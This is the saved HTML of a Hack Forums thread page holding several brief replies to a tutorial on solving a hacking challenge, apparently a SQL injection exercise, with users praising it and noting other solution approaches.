href="http://www.hackforums.net/showthread.php?tid=3239625&amp;pid=30467434#pid30467434">#4</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=895241"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/avatar_895241.jpg" alt="" height="100" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=895241"><span class="group29">-zerocool</span></a></span></strong> <img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 84<br>Posts: 977<br>Joined: Jul 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=895241"><strong class="reputation_positive">153</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_30467434">No need to use live http header. . we could get url without it .</div><div class="post_meta" id="post_meta_30467434"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://ultimatehackingarticles.blogspot.com/" target="_blank" class="bitButton" rel="nofollow" title="Visit this user's website">WWW</a> <a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=895241" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"></div></td></tr></tbody></table><a name="pid30470655" id="pid30470655"></a><table class="tborder" style="margin-top: 5px; " id="post_30470655" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">02-10-2013, 09:13 AM <span id="edited_by_30470655"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3239625&amp;pid=30470655#pid30470655">#5</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 133<br>Posts: 2,157<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">194</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_30470655"><blockquote><cite><span>(02-10-2013 04:42 AM)</span>p0pc0rn Wrote: <a href="http://www.hackforums.net/showthread.php?pid=30466177#pid30466177" class="quick_jump">►</a></cite>ah..so there's another way to solve it as well. nice one.this one looks more understandable :)</blockquote><br>yep,
 there are other ways to solve it too. Two additional are mentioned for 
exercise :) I didn't check for others as three ways are enough...</div><div class="post_meta" id="post_meta_30470655"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"></div></td></tr></tbody></table><a name="pid30472112" id="pid30472112"></a><table class="tborder" style="margin-top: 5px; " id="post_30472112" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">02-10-2013, 10:11 AM <span id="edited_by_30472112"><span class="smalltext">(This post was last modified: 02-10-2013 10:11 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1241186">hackforumspang</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3239625&amp;pid=30472112#pid30472112">#6</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1241186"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/0fa0f9ce54eb150d907f3e0e35a039cf.png" alt="" height="80" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1241186"><span class="group2">hackforumspang</span></a></span></strong> <img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Sardaukar<br><span class="userstars"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 58<br>Posts: 1,843<br>Joined: Apr 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1241186"><strong class="reputation_positive">116</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_30472112">Nice
 tutorial. Gives a little more insight about how SQL Injection does not 
always have to be URL based, and stresses on how important analyzing 
error messages carefully is.<br>Cool <img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_30472112"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1241186" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"></div></td></tr></tbody></table><a name="pid30489484" id="pid30489484"></a><table class="tborder" style="margin-top: 5px; " id="post_30489484" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">02-10-2013, 08:35 PM <span id="edited_by_30489484"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3239625&amp;pid=30489484#pid30489484">#7</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1663019"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/avtr2-1.png" alt="" height="72" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1663019"><span class="group2">-Claudius-</span></a></span></strong> <img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 16<br>Posts: 78<br>Joined: Feb 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1663019"><strong class="reputation_positive">4</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_30489484">Crystal clear tutorial and definitely bookmarked!<br>Hats off to you, ajkaro.</div><div class="post_meta" id="post_meta_30489484"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1663019" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"></div></td></tr></tbody></table><a name="pid30521096" id="pid30521096"></a><table class="tborder" style="margin-top: 5px; " id="post_30521096" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">02-12-2013, 03:28 AM <span id="edited_by_30521096"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3239625&amp;pid=30521096#pid30521096">#8</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 133<br>Posts: 2,157<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">194</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_30521096"><blockquote><cite><span>(02-10-2013 10:11 AM)</span>hackforumspang Wrote: <a href="http://www.hackforums.net/showthread.php?pid=30472112#pid30472112" class="quick_jump">►</a></cite>...and stresses on how important analyzing error messages carefully is.<br>...</blockquote><br>Absolutely true <img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/oui.gif" style="vertical-align: middle;" alt="Oui" title="Oui" border="0"><br><br><hr><br><blockquote><cite><span>(02-10-2013 08:35 PM)</span>-Claudius- Wrote: <a href="http://www.hackforums.net/showthread.php?pid=30489484#pid30489484" class="quick_jump">►</a></cite>Crystal clear tutorial and definitely bookmarked!<br>Hats off to you, ajkaro.</blockquote><br>Thanks for kind words... <img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_30521096"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=3239625&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=3239625&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=3239625" class="bitButton" style="margin-bottom:5px;" rel="nofollow" title="Thread Closed">Closed</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=3239625">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=3239625" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3239625&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-3239625.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->